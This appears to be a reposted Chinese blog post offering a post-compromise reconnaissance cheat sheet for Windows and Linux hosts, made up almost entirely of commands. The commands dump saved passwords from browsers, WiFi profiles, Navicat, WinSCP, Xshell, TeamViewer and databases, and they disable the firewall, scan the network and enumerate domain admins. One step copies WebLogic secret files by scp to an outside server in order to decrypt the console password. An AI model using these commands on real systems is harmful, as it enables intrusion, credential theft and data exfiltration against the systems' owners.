美文网首页
内网信息收集

内网信息收集

作者: migrate_ | 来源:发表于2020-05-22 10:46 被阅读0次
    原文
    https://www.jianshu.com/p/6d038124c216
    
    • 通常当我们拿下一台主机之后,我们的目的是内网横向渗透,在这个过程中必不可少的一项就是信息收集,信息收集的越全面,往往意味着成功的机率就越大。

    一,windows

    cmd

    systeminfo 查看计算机信息
    query user 查在线用户
    netstat -ano | find "3389" 查看网络连接信息
    arp -a 查看arp缓存
    route print 查看路由表
    wmic product get name,version 查看安装的软件
    wmic qfe list 查看已安装的补丁
    
    查看/终止进程:
    tasklist /svc
    tasklist /s 192.168.80.11 /u admin /p 123 /svc
    taskkill /f /im qq.exe
    taskkill /pid 2476
    
    快速搜索文件
    findstr /c:"DB_USER" /c:"DB_PASSWORD" /si *.php
    findstr /c:"user=" /c:"pass=" /c:"pwd=" /c:"password=" /si *.php *.xml
    
    

    查WiFi密码

    netsh wlan show profile
    netsh wlan show profile wifi-name key=clear
    

    关闭防护墙

    关闭防火墙:netsh firewall set opmode mode=disable 
    防火墙恢复默认配置:netsh firewall reset
    

    查mysql密码

    select Host,User,Password,authentication_string from mysql.user;
    

    查mssql密码

    SELECT name,password_hash FROM master.sys.sql_logins;
    

    提取浏览器已保存的密码

    http://www.nirsoft.net/utils/web_browser_password.html  火狐浏览器
    http://www.nirsoft.net/utils/chromepass.html  谷歌浏览器
    

    提取Navicat已保存的密码

    工具下载地址:
    https://github.com/HyperSine/how-does-navicat-encrypt-password
    
    1. 从注册表中查询host/username/pwd
    reg query HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\ /s /v host
    reg query HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\ /s /v username
    reg query HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\ /s /v pwd
    2. 使用工具进行解密
    python NavicatCipher.py dec 5658213B
    

    提取winscp已保存的密码

    工具下载地址:
    https://bitbucket.org/knarf/winscppwd/downloads/winscppwd.exe
    1. 查询注册表中winscp保存的密文(cobalt strike)
    shell reg query "HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions"
    shell reg query "HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\root@192.168.80.164"
    2. 使用winscppwd.exe进行解密
    winscppwd.exe root 192.168.80.164 A35C4A54D144F65B7DF0E8F42E3333286D656E726D6A6472646C726D6A682833332EFA7A248229B891A201911C3F588380D6
    3. 或者直接使用msf中的模块
    meterpreter > run post/windows/gather/credentials/winscp 
    

    提取Xshell已保存的密码

    Xshell目前主要有5.x和6.x两个版本,session文件分别保存在如下位置:
    %userprofile%\Documents\NetSarang\Xshell\Sessions
    %userprofile%\Documents\NetSarang Computer\6\Xshell\Sessions
    解密工具下载地址:
    https://github.com/dzxs/Xdecrypt
    1. 查看是否存在xshell配置文件(cs命令)
    shell cd "%userprofile%\Documents\NetSarang Computer\6\Xshell\Sessions"&dir
    2. 读取xsh文件中的用户名和密码的密文
    shell type "C:\Users\Administrator\Documents\NetSarang Computer\6\Xshell\Sessions\192.168.80.164.xsh"
    3. 查询用户的SID
    shell whoami /user
    4. 使用脚本进行解密
    python Xdecrypt.py -s AdministratorS-1-5-21-464702021-3836885353-1586058702-500 -p "UzQLCHPiipSEypdz5qLORoRblWuytx8aAGFMl3plBK+pi+30QDkGUg=="
    

    提取teamviewer的密码

    实际利用的是CVE-2019-18988漏洞,可以读取Teamviewer的ID和控制密码,如果登录窗口存在密码还会读取Email和登录密码。
    meterpreter > run post/windows/gather/credentials/teamviewer_passwords
    

    提取filezilla已保存的密码

    meterpreter > run post/multi/gather/filezilla_client_cred
    

    使用lazagne导出各种密码

    工具下载地址:
    https://github.com/AlessandroZ/LaZagne
    lazagne.exe browsers -firefox -oN
    lazagne.exe browsers
    lazagne.exe browsers -h
    laZagne.exe all -oN
    

    icmp扫描

    for /l %i in (1,1,255) do @ping 192.168.1.%i -w 1 -n 1 | find /i "ttl"
    

    arp扫描

    https://github.com/QbsuranAlang/arp-scan-windows-.git
    arp-scan.exe -t 192.168.80.0/24
    

    端口扫描

    https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/Invoke-Portscan.ps1
    powershell -exec bypass
    Import-Module C:\Users\Administrator\Desktop\Invoke-Portscan.ps1
    Invoke-Portscan -Hosts 192.168.80.0/24 -T 4 -Ports "21,22,23,80,1433,1521,3306,3389" | Out-File port_info.txt
    

    域内信息收集

    net time \\test-lab.lab.com 查看目标主机的时间
    net user /domain 查看域内的用户
    net accounts /domain 查看域的密码策略
    net view /domain 查看有几个域
    net group /domain 查看域里面的组
    net config workstation 查看当前域
    net group "domain admins" /domain 查看域管理员
    net group "domain controllers" /domain 查看域控制器
    net user user2 /domain 查看指定域账户的信息
    net group "domain computers" /domain 查看域内所有主机
    wmic computersystem get domain 查看当前域
    wmic useraccount get Caption,sid 查看域内所有主机的sid
    

    定位域控

    通常域内主机DNS地址就是域控地址
    ping工作站域DNS名称进一步确认
    ping lab.com
    

    二、Linux

    icmp扫描

    for i in 10.28.98.{1..254}; do if ping -c 1 -w 1 $i &>/dev/null; then echo $i is alived; fi; done
    

    端口扫描

    推荐一个python脚本,不需要任何三方依赖
    https://github.com/ywolf/F-NAScan.git
    python F-NAScan.py -h 192.168.80.148 -p port.ini -m 50 -t 10 -n
    python F-NAScan.py -h ip.ini -p port.ini -m 50 -t 10
    python F-NAScan.py -h 192.168.1.10 -p 21,22,80,161,443,445,873,1080,1099,1433,1434,1521,2049,2375,3306,3389,5432,5984,6379,7001,8001,8080,9200,27017 -m 50 -t 10 -n
    

    nmap

    1. 主机发现
    -n 取消反向域名解析
    -F 扫描top100端口
    --top-ports <number> 扫描开放率最高的number个端口,默认是1000
    -Pn 跳过主机发现的过程,默认主机在线
    -sn 只进行主机发现,不进行端口扫描,老版本叫-sP
    -PR 使用ARP协议进行主机发现
    nmap -sn -n 192.168.80.0/24
    nmap -sn -PR -n 192.168.80.0/24
    2. 端口扫描
    nmap -n 192.168.70.248 -p1099 -Pn
    nmap -n -sT 192.168.70.248 -p1099 -Pn
    

    查在线用户/用户登录记录

    who
    last
    

    配置文件中找数据库的密码

    config.php、web.config等
    java的站通常在jdbc文件中有数据库的密码
    locate WEB-INF | grep .properties
    locate WEB-INF | grep jdbc.properties
    find / -name .properties 2>/dev/null
    find ./ -name "*.properties" | xargs egrep -i "user|pass|pwd|uname|login|db_"
    

    查历史记录

    .bash_history
    .mysql_history
    .rediscli_history
    .viminfo
    

    查ssh登录历史

    ~/.ssh/known_hosts
    

    查内网下的其它主机

    arp -a
    route -n
    cat /proc/net/arp
    

    查SUID可执行文件

    find / -perm -u=s -type f 2>/dev/null
    

    查系统信息

    uname -a
    cat /etc/*-release
    

    解密weblogic控制台的密码

    weblogic的密码使用AES(老版本3DES)加密,这两种加密方式都属于对称加密,加密密钥和解密密钥相同。所以我们只要找到服务器上的密文和密钥,就可以解密获得明文密码。这两个文件均位于weblogic的domains目录下,名为SerializedSystemIni.dat和config.xml。
    1. config.xml位于config目录下,我们使用scp命令复制到自己的服务器上
    scp config.xml test@1.1.1.1:/tmp/
    2. SerializedSystemIni.dat位于security目录下,同样使用scp命令进行复制
    scp SerializedSystemIni.dat test@1.1.1.1:/tmp/
    3. 使用解密工具进行解密,这里使用vulhub中提供的工具
    https://github.com/vulhub/vulhub/tree/master/weblogic/weak_password/decrypt
    4. 文件选择SerializedSystemIni.dat,密码为config.xml文件中<node-manager-password-encrypted>的值,如下图解密成功,得到了明文密码
    

    相关文章

      网友评论

          本文标题:内网信息收集

          本文链接:https://www.haomeiwen.com/subject/btifahtx.html